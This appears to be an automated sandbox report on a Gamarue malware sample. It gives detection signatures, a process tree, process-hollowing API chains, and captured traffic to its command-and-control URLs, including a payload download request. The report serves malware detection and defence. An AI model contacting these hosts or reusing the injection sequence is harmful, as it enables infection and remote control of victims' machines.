Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Hu25VEa8Dr.exe

Overview

General Information

Sample Name:Hu25VEa8Dr.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original Sample Name:9535a9bb1ae8f620d7cbd7d9f5c20336b0fd2c78d1a7d892d76e4652dd8b2be7
Analysis ID:1317431
MD5:bc76bd7b332aa8f6aedbb8e11b7ba9b6
SHA1:c6858031315a50ec87e37966291ec69b64600efb
SHA256:9535a9bb1ae8f620d7cbd7d9f5c20336b0fd2c78d1a7d892d76e4652dd8b2be7
Infos:

Detection

Gamarue
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Tries to download HTTP data from a sinkholed server
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Yara detected Gamarue
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Contain functionality to detect virtual machines
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Tries to detect virtualization through RDTSC time measurements
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Contains functionality to check if Internet connection is working
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to get notified if a device is plugged in / out
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Uses Microsoft's Enhanced Cryptographic Provider
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • Hu25VEa8Dr.exe (PID: 2948 cmdline: C:\Users\user\Desktop\Hu25VEa8Dr.exe MD5: BC76BD7B332AA8F6AEDBB8E11B7BA9B6)
    • Sahofivizu.exe (PID: 920 cmdline: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe" "C:\Users\user\Desktop\Hu25VEa8Dr.exe MD5: 7FE00CC4EA8429629AC0AC610DB51993)
      • Hu25VEa8Dr.exe (PID: 1724 cmdline: C:\Users\user\Desktop\Hu25VEa8Dr.exe MD5: BC76BD7B332AA8F6AEDBB8E11B7BA9B6)
        • Hu25VEa8Dr.exe (PID: 2092 cmdline: C:\Users\user\Desktop\Hu25VEa8Dr.exe MD5: BC76BD7B332AA8F6AEDBB8E11B7BA9B6)
          • msiexec.exe (PID: 1948 cmdline: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" MD5: B3657BCFE8240BC0985093A0F8682703)
            • Lohonibuhod.exe (PID: 1396 cmdline: "C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe" "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" MD5: 44902781C1865978B17F396DB51D85E1)
              • msiexec.exe (PID: 2748 cmdline: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" MD5: B3657BCFE8240BC0985093A0F8682703)
                • msiexec.exe (PID: 2948 cmdline: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" MD5: B3657BCFE8240BC0985093A0F8682703)
    • svchost.exe (PID: 1740 cmdline: C:\Windows\syswow64\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: svchost.exe PID: 1740JoeSecurity_GamarueYara detected GamarueJoe Security
    No Sigma rule has matched
    Timestamp:147.75.61.38192.168.2.2280491662031515 10/01/23-06:01:37.455932
    SID:2031515
    Source Port:80
    Destination Port:49166
    Protocol:TCP
    Classtype:Misc activity

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Hu25VEa8Dr.exeReversingLabs: Detection: 95%
    Source: Hu25VEa8Dr.exeVirustotal: Detection: 81%Perma Link
    Source: Hu25VEa8Dr.exeAvira: detected
    Source: http://orzdwjtvmein.in/in.phpAvira URL Cloud: Label: malware
    Source: http://bdcrqgonzmwuehky.nl/in.phpAvira URL Cloud: Label: malware
    Source: http://somicrososoft.ru/in.phpAvira URL Cloud: Label: malware
    Source: http://xdqzpbcgrvkj.ru/in.phpAvira URL Cloud: Label: malware
    Source: http://anam0rph.su/in.phpAvira URL Cloud: Label: malware
    Source: http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqhAvira URL Cloud: Label: malware
    Source: http://ygiudewsqhct.in/in.phpAvira URL Cloud: Label: malware
    Source: xdqzpbcgrvkj.ruVirustotal: Detection: 18%Perma Link
    Source: http://orzdwjtvmein.in/in.phpVirustotal: Detection: 11%Perma Link
    Source: http://pe.suckmycocklameavindustry.in/Virustotal: Detection: 6%Perma Link
    Source: anam0rph.suVirustotal: Detection: 11%Perma Link
    Source: http://bdcrqgonzmwuehky.nl/in.phpVirustotal: Detection: 11%Perma Link
    Source: http://somicrososoft.ru/in.phpVirustotal: Detection: 14%Perma Link
    Source: pe.suckmycocklameavindustry.inVirustotal: Detection: 6%Perma Link
    Source: http://anam0rph.su/in.phpVirustotal: Detection: 13%Perma Link
    Source: http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqhVirustotal: Detection: 14%Perma Link
    Source: http://ygiudewsqhct.in/in.phpVirustotal: Detection: 13%Perma Link
    Source: http://xdqzpbcgrvkj.ru/in.phpVirustotal: Detection: 16%Perma Link
    Source: http://sc.suckmycocklameavindustry.in/Virustotal: Detection: 6%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\Gozekeneka.dllAvira: detection malicious, Label: HEUR/AGEN.1358866
    Source: C:\Users\user\AppData\Local\Temp\0BBFF.tmpAvira: detection malicious, Label: TR/AD.Gamarue.njjtd
    Source: C:\Users\user\AppData\Local\Temp\xuxokuxoka.dllAvira: detection malicious, Label: TR/Symmi.17001.30
    Source: C:\Users\user\AppData\Local\Temp\naseropuxeq.dllAvira: detection malicious, Label: TR/Graftor.75972.7
    Source: C:\Users\user\AppData\Local\Temp\yiduyevutog.dllAvira: detection malicious, Label: TR/Symmi.17001.22
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeAvira: detection malicious, Label: TR/Agent.hwpf
    Source: C:\Users\user\AppData\Local\Temp\natigezeholi.dllAvira: detection malicious, Label: HEUR/AGEN.1328724
    Source: C:\ProgramData\Local Settings\Temp\msoiruj.batAvira: detection malicious, Label: TR/AD.Gamarue.djauj
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeAvira: detection malicious, Label: HEUR/AGEN.1344339
    Source: C:\Users\user\AppData\Local\Temp\Jahulocayedo.dllAvira: detection malicious, Label: TR/Symmi.17001.23
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeAvira: detection malicious, Label: TR/AD.Gamarue.djauj
    Source: C:\Users\user\AppData\Local\Temp\Zojemilocan.dllAvira: detection malicious, Label: HEUR/AGEN.1322941
    Source: C:\ProgramData\Local Settings\Temp\msoiruj.batReversingLabs: Detection: 86%
    Source: C:\ProgramData\Local Settings\Temp\msoiruj.batVirustotal: Detection: 84%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\0BBFF.tmpReversingLabs: Detection: 95%
    Source: C:\Users\user\AppData\Local\Temp\0BBFF.tmpVirustotal: Detection: 81%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\Firozedikami.dllReversingLabs: Detection: 59%
    Source: C:\Users\user\AppData\Local\Temp\Firozedikami.dllVirustotal: Detection: 59%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\Gozekeneka.dllReversingLabs: Detection: 76%
    Source: C:\Users\user\AppData\Local\Temp\Gozekeneka.dllVirustotal: Detection: 75%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\Jahulocayedo.dllReversingLabs: Detection: 70%
    Source: C:\Users\user\AppData\Local\Temp\Jahulocayedo.dllVirustotal: Detection: 65%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeReversingLabs: Detection: 75%
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeVirustotal: Detection: 77%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeReversingLabs: Detection: 86%
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeVirustotal: Detection: 84%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeReversingLabs: Detection: 56%
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeVirustotal: Detection: 60%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\Zojemilocan.dllReversingLabs: Detection: 64%
    Source: C:\Users\user\AppData\Local\Temp\Zojemilocan.dllVirustotal: Detection: 74%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\naseropuxeq.dllReversingLabs: Detection: 59%
    Source: C:\Users\user\AppData\Local\Temp\naseropuxeq.dllVirustotal: Detection: 71%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\natigezeholi.dllReversingLabs: Detection: 78%
    Source: C:\Users\user\AppData\Local\Temp\natigezeholi.dllVirustotal: Detection: 75%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\xuxokuxoka.dllReversingLabs: Detection: 66%
    Source: C:\Users\user\AppData\Local\Temp\xuxokuxoka.dllVirustotal: Detection: 67%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\yiduyevutog.dllReversingLabs: Detection: 70%
    Source: C:\Users\user\AppData\Local\Temp\yiduyevutog.dllVirustotal: Detection: 72%Perma Link
    Source: C:\ProgramData\Local Settings\Temp\msoiruj.batJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeJoe Sandbox ML: detected
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 3_2_00402493 PathCombineA,CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 7_2_00402493 PathCombineA,CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,

    Compliance

    barindex
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeUnpacked PE file: 3.2.Hu25VEa8Dr.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeUnpacked PE file: 4.2.Hu25VEa8Dr.exe.400000.1.unpack
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeUnpacked PE file: 7.2.msiexec.exe.400000.0.unpack
    Source: Hu25VEa8Dr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: Binary string: T:\ldr\CUSTOM\local\Worm65.DLL.PnP\Release\Worm65.DLL.pdb source: svchost.exe, svchost.exe, 00000009.00000003.373478974.0000000000130000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: T:\ldr\CUSTOM\local\local\Release\ADropper.pdb source: Hu25VEa8Dr.exe, Hu25VEa8Dr.exe, 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp
    Source: Binary string: svchost.pdb source: svchost.exe, 00000009.00000002.381614429.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E29C0 _memset,UnregisterDeviceNotification,CloseHandle,UnregisterDeviceNotification,CloseHandle,wsprintfW,wsprintfW,GetDriveTypeW,GetDriveTypeW,GetDriveTypeW,wsprintfW,CreateFileW,RegisterDeviceNotificationW,Sleep,DefWindowProcW,UnregisterDeviceNotification,CloseHandle,PostQuitMessage,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00405D07 FindFirstFileA,FindClose,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00405331 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_0040263E FindFirstFileA,
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_00405D07 FindFirstFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_00405331 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_0040263E FindFirstFileA,
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E1E80 GetFileAttributesW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,MoveFileExW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E1700 GetDriveTypeW,wsprintfW,wsprintfW,FindFirstFileW,DeleteFileW,wsprintfW,wsprintfW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,lstrcmpiW,lstrcmpiW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,lstrcmpiW,lstrcmpiW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,wsprintfW,SetFileAttributesW,FindNextFileW,FindClose,
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E1B70 wsprintfW,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,FindClose,FindClose,
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E10D0 RegisterClassW,LdrInitializeThunk,_memset,GetLogicalDriveStringsW,GetDriveTypeW,GetDriveTypeW,SetErrorMode,CreateWindowExW,GetMessageW,GetMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,GetMessageW,

    Networking

    barindex
    Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 147.75.61.38 80
    Source: C:\Windows\SysWOW64\svchost.exeDomain query: pe.suckmycocklameavindustry.in
    Source: C:\Windows\SysWOW64\svchost.exeDomain query: xdqzpbcgrvkj.ru
    Source: C:\Windows\SysWOW64\svchost.exeDomain query: anam0rph.su
    Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.29.71.138 80
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Oct 2023 04:01:37 GMTContent-Length: 607Content-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
    Source: TrafficSnort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 147.75.61.38:80 -> 192.168.2.22:49166
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00021474 socket,connect,getsockname,shutdown,closesocket, www.update.microsoft.com
    Source: global trafficHTTP traffic detected: POST /in.php HTTP/1.1Host: xdqzpbcgrvkj.ruUser-Agent: Mozilla/4.0Content-Type: application/x-www-form-urlencodedContent-Length: 84Connection: close
    Source: global trafficHTTP traffic detected: GET /dtkdvjezlgdvslgbvqqjiiheaxroigff HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pe.suckmycocklameavindustry.inConnection: Keep-Alive
    Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://anam0rph.su/in.php
    Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://bdcrqgonzmwuehky.nl/in.php
    Source: svchost.exeString found in binary or memory: http://img.suckmycocklameavindustry.in/
    Source: Hu25VEa8Dr.exe, 00000003.00000002.350134891.0000000002120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/
    Source: msiexec.exe, msiexec.exe, 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000005.00000000.351213851.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000007.00000000.364458175.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000008.00000000.365114158.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, Hu25VEa8Dr.exe, 0BBFF.tmp.4.dr, msoiruj.bat.9.dr, msiexec.exe.4.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
    Source: Hu25VEa8Dr.exe, 0BBFF.tmp.4.dr, msoiruj.bat.9.dr, msiexec.exe.4.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://orzdwjtvmein.in/in.php
    Source: svchost.exeString found in binary or memory: http://pe.suckmycocklameavindustry.in/
    Source: svchost.exe, 00000009.00000003.373478974.0000000000130000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://pe.suckmycocklameavindustry.in/DOS_STUBhttp://sc.suckmycocklameavindustry.in/ImageBasehttp://
    Source: svchost.exe, 00000009.00000002.381503603.0000000000484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigff
    Source: svchost.exe, 00000009.00000002.381503603.0000000000484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigff6Tl
    Source: svchost.exe, 00000009.00000002.381503603.00000000004D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381500240.000000000044A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigffC:
    Source: svchost.exeString found in binary or memory: http://sc.suckmycocklameavindustry.in/
    Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://somicrososoft.ru/in.php
    Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://xdqzpbcgrvkj.ru/in.php
    Source: svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqh
    Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ygiudewsqhct.in/in.php
    Source: unknownHTTP traffic detected: POST /in.php HTTP/1.1Host: xdqzpbcgrvkj.ruUser-Agent: Mozilla/4.0Content-Type: application/x-www-form-urlencodedContent-Length: 84Connection: close
    Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\dtkdvjezlgdvslgbvqqjiiheaxroigff[1].htmJump to behavior
    Source: unknownDNS traffic detected: queries for: xdqzpbcgrvkj.ru
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E1430 _memset,_memset,_memset,GetTempPathW,GetTempFileNameW,RegOpenKeyExW,RegQueryValueExW,RegSetValueExW,RegCloseKey,URLDownloadToFileW,DeleteFileW,DeleteFileW,SetFileAttributesW,DeleteFileW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,RegOpenKeyExW,RegSetValueExW,RegCloseKey,VirtualFree,CloseHandle,DeleteFileW,DeleteFileW,SetFileAttributesW,DeleteFileW,
    Source: global trafficHTTP traffic detected: GET /dtkdvjezlgdvslgbvqqjiiheaxroigff HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pe.suckmycocklameavindustry.inConnection: Keep-Alive
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00404EE8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
    Source: Hu25VEa8Dr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_004030FA EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_004030FA EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00406128
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_004046F9
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_004068FF
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_0040F80F
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_0040F038
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_0040D609
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_00406128
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_004046F9
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_004068FF
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 8_2_004017AF
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E21A0
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeCode function: 2_2_10001000 bedevahetay,LoadLibraryA,GetCommandLineA,PathGetArgsA,RtlZeroMemory,LoadLibraryA,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,SetThreadContext,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 3_2_00402298 PathCombineA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeCode function: 6_2_10001000 zejutuhodomo,GetModuleHandleA,GetCommandLineA,PathGetArgsA,RtlZeroMemory,LoadLibraryA,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,SetThreadContext,
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 7_2_00402298 PathCombineA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 8_2_00401284 NtAllocateVirtualMemory,
